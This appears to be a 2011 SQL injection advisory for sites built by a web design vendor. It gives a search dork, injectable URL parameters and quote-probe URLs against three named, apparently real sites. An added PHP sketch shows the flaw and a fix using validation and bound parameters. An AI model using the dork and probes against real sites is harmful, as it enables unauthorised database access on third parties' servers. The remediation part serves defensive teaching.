##########################################################
# Title: Gold Coast Web Design SQL Injection
# Author: AngelParrot
# Date: 2011/12/19
# Category: Webapps
# Vendor: http://goldcoastwebdesign.com/
# Google Dork: inurl:php?id= intext:"web site by: goldcoastwebdesign.com"
##########################################################

# Exploit
http://example.com/news.php?MenuID=[SQL]
http://example.com/services_detail.php?CategoryID=[SQL]
http://example.com/staff.php?CategoryID=*&MenuID=[SQL]
etc.

# Demo Site
http://akronpolysys.com/news.php?MenuID=27'
http://www.1stsecureit.com/services_detail.php?CategoryID=2'
http://www.caddyforacure.com/staff.php?CategoryID=3&MenuID=17'
etc.

# Error Message
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
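
# Mitigation example (added; not part of the original advisory and not the vendor's code)
The backslash in the error message above is consistent with the quote being escaped before it reached the query, which does not protect a numeric parameter that is concatenated without quotes. The sketch below contrasts that assumed pattern with integer validation plus a bound parameter for MenuID. The table, column and function names are hypothetical, and an in-memory SQLite database stands in for MySQL so the script runs offline.

```php
<?php
// Added example: table, column and function names are assumptions; the
// vendor's source is not shown in the advisory.
// SQLite in memory stands in for MySQL so the script runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE news (MenuID INTEGER, title TEXT)');
$db->exec("INSERT INTO news VALUES (27, 'Constructed sample row')");

// Assumed vulnerable pattern: escaped input placed in an unquoted numeric slot.
function news_vulnerable(PDO $db, string $menuId): array {
    $sql = 'SELECT title FROM news WHERE MenuID = ' . addslashes($menuId);
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: strict integer validation, then a bound parameter.
function news_hardened(PDO $db, string $menuId): array {
    $id = filter_var($menuId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];  // caller should answer 400/404; no SQL is run
    }
    $stmt = $db->prepare('SELECT title FROM news WHERE MenuID = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed inputs: a normal id and the probe value shown under "Demo Site".
foreach (['27', "27'"] as $input) {
    try {
        $rows = news_vulnerable($db, $input);
        echo "vulnerable($input): " . count($rows) . " row(s)\n";
    } catch (PDOException $e) {
        echo "vulnerable($input): SQL error raised by the database layer\n";
    }
    echo "hardened($input): " . count(news_hardened($db, $input)) . " row(s)\n";
}
```

The same validation and binding applies to CategoryID in services_detail.php and staff.php; database error text should also be logged server-side rather than returned in the page.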